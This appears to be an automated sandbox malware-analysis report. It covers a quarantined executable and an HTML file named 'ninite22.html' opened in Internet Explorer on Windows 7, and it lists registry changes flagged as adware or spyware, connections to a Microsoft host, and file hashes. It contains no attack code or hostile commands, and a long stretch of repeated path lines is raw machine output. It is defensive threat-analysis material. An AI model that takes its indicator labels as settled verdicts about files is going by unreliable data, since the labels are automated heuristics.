"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Network

N/A

Files

memory/1848-0-0x000000007408E000-0x000000007408F000-memory.dmp

memory/1848-1-0x0000000000170000-0x00000000002E0000-memory.dmp

memory/1848-3-0x0000000074080000-0x000000007476E000-memory.dmp

memory/1848-4-0x000000007408E000-0x000000007408F000-memory.dmp

memory/1848-5-0x0000000074080000-0x000000007476E000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20241010-en

Max time kernel

119s

Max time network

128s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D47E2601-F49B-11EF-8CE5-7A300BFEC721} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000637e6a747cf93644957c7233b516f62e000000000200000000001066000000010000200000008829dad02779f8ca5e9034bc44b86f7867a46dde2cd60b8dfc9fadded51901c2000000000e8000000002000020000000bfc849fe4b9c8824d3adb611e97a5f13d143dd5d0378e132062c6cd937fd69cf90000000818d045b3d7c88ddd2297192a3b62a13ecc411159a58532026f1dfaccf3534d3d3f405173c59b3df6980725a2ff0d95056a82f6b5d18bd18e8bea4abc35299282fe634e74eb65e3b9c45890a6fe29b84b9e4e96007c014f816bed2e8f650368a6513c5755a39fa0bfc076975e242130f8001144e1534c501d9d258709ac297082d9cd622e56085d5b187fdbd3dc2af6340000000c5d7f06aa85055c686a5a7b75b02be66fec9e5831e56a57683ad3ae4923bfa5aeb7eebfb12f39d7db53a3a80c62b62f00dad45684c8bfe383f55a19d629dbd7a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000637e6a747cf93644957c7233b516f62e00000000020000000000106600000001000020000000970f538f63f570139605d889ba2eb006e930d9f633e09586cc805e0d5eab058f000000000e8000000002000020000000caa4277bceba91bee4b12bbb106e2e35aa9809855e2d5b5f7c8692f2258467da2000000082ccc270abb5ab648d69bfc25b90671f5e761c542e825f96954e1e0bbb1ea5ce40000000d7cb9b96230e5a2d459de91d460b127ca275ccec10a7bfdfab3478d9eaa9d190a1b1262a740b88b6e2a17945440d929948c3ab582767f6054b016ec1afc97f16 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 301314a9a888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775427" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ninite22.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2172 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab7AFD.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\Tar7C0D.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1e2cc55bb6344292233978f27c8d0dc5
SHA1 978b6f7aad52be515dfad74a015c231566aeca7c
SHA256 2eb3ccfdf97955bb7a5050917a3307b80c8fcbd8a69c2a6b12d9493f6bcc3a24
SHA512 d0ddb92986a40d907ae9385502c3f6c15f796ecacda725d1daf9c60d9c96bbbac4016b4da84e888a12aac6fa3a47511f8c2a4f455ce209f6ac9a75dd8ad4aa8e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 37847edb3d852ccead003da96add8a97
SHA1 77ee9921743df851d77559d246e76c8793aa934f
SHA256 f8db576471b28d82325804c22daf2c7e3235d859af3db013538732d92a349dc8
SHA512 b0cd0e7322f0a7cf8be1a3eda94a7a26b2a544f69b287cb0c71a1c8a44aca05725be8a07be7ccd80add0fc729df55c8dd596c7e9d007c95f2b45d1d9e3d75c41

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 941588a47a79b03701387a3b3d356d05
SHA1 ba7273d44e865d9634786c9d57c1716f5054d1a8
SHA256 13939e88b61a21436c68dc9ec2118c119b34bfc55050b99af1819aa56cda28aa
SHA512 d38c1186974b2b0538bd01c99f9f3a029d402d48650bb3f374185a01492608c33fc72a784407a6b3d01afb6433aa4ccbc0cdc3024cd42500cf69b82404e1579d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 50d7c4ce1182d3e6547952d513d07590
SHA1 71954fd11fd03bb71f7e1758e6b368eeaa0ddd93
SHA256 2e7101f001c9b56fed5d06fb2b6634a145481959e35076ef36f4d73b48ac04f1
SHA512 581e5898bb919513200a90cd5e9cfb87ff5160ee3c87f8461e439205d3c6332025915b7c1a476eb3568cbd96a4ea3ecce4ec85cd598b9797dee7254c6daf6720

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 53049f590f920c27bc1f2130cb146d40
SHA1 ca2e3da4aa688a1b0d47aa889b6ac3023eddb25d
SHA256 faf472d2ed01159c6d9ee74b86af5442aad2d81937c60c7b1ce7eb66c436501e
SHA512 de2632904d06fac6411d6f1a008ba29fa3e4d2ef3f8fc7418a201b4d0c3147adc255813495a22e0bbb2f78cb022f42ad487c32bdf4f7ddc802d0a33903489374

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ba4f590460bcde51f896eb4645876cdf
SHA1 320920d7e780246e04901ed3b2779a5e171f6767
SHA256 3783ccd584816000b5f131d56633eb8fe5491dc9f9296273bcb5aa4100432fc6
SHA512 120a0a4ea1987f7efc4570f830f9ab37a4f0bcb9d03c3160f428f1decfba3e6d96921c4a1fd93c2c05220099cedbc58725b267a24737e485cdf0f9e1e6bf049a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b49bb2f9a563176240d955780723da80
SHA1 cdb41bcb8d2dcd056deb13279a336ee210e24cae
SHA256 6c77622097a9e3fe7e4595248ed4f1364a672d85735fac82b48f2116617419ae
SHA512 630ea2c39d3d1cd038ffc081274664e1444f8a8ab88f8eb711f8c8f54a5bcb279b684d5cada4666e716ecb677f391088881027cb323878a08d299e4caf085580

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3f2971e3e2f7e28a33bc6c9c04edb0e5
